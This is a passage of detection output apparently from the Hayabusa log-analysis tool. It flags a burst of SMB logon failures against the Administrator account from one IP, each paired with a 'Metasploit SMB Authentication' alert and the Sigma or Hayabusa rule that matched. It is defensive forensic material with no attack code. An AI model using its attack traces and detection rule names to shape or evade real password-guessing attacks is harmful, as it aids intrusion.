Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.298 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n1OnibuatFHwDeLz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.298 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.342 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O8u26bKzFOw12m0T : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.342 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.380 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WEEtOj6BOkI7MPY1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.380 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.420 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EiCpuqll36DojD3e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.420 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.469 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p9zjo9ZsSVLZcrsr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.469 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.530 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KKDD0O5flEsIEDRZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.530 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.582 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jdPMREVdBEJ50ELC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.582 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.626 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p7YwRYYCnsr2v08C : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.626 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.677 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nWyAzzpmxUm2CXE9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.677 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9RNqhxyUBjUIic0n : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.724 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.774 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1JERyz3mOBZt2jki : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.774 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.817 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V0i93RW5AOsIKKMU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.817 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.875 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: U3XEu06vE68O900O : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.875 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.925 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0fxeGE2jXOnoJttj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.925 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.969 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6Wdg3l6IFHTdh09j : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.969 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.028 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4XLVQRnkUd3bfgvF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.028 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rHjqFQwqpCJFI6qP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.080 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.139 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: L5pEWq2mYsFpFLbb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.139 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HSFKJXTC2wlyw0gu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.184 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.225 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vh5igCJpAA5rmqzV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.225 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.260 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5NzLlJWkfXDcm64c : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.260 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.309 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i9sR1QHgZ4oaa82F : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.309 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.340 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Pq1GWcKzSHSP28hk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.340 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.388 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: agCtM0s62zXPop0y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.388 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.430 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dVvglj7RtxrBUeXi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.430 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.482 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pMbS0sIpbFDqJvMW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.482 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.525 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ldO0cAZ54BRHHDyz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.525 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.577 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OmJH2QWFPiYarKh5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.577 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.620 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5fCiyHtI0OTo8pBO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.620 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.664 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: e3vkVuU43tsYHUSj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.664 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.714 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3w21sFOu2u7FTDZM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.714 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.756 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Bk7eaqQNK1CEgqoj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.756 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.792 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Rv5joLgkm3QUYPyb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.792 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4l15usDM7jggwEyw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.841 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.887 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p9QpOvgDmiOgzQqb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.887 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.935 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Dqyr8tb9TrO1aJNe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.935 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.985 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hI1bzjixP8eOdDbw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.985 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.032 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pMTAp20wXS3d1OCk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.032 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.078 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qrQGfxInmlgPqGtd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.078 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZcsMMQbsnUdyLJWi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.128 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.224 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8oRYZqBBsq9GyApI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.224 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0TAhib6p8fY5iOgI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.256 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.306 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FerGHj9abOe6ehZn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.306 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.362 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kN4B4KLpXbyKZzGv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.362 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.417 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HJtoyRfP38T3KToO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.417 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.457 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rkI5hLApUWhGnKIs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.457 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZCPSO4JLjMur2Eow : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.484 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 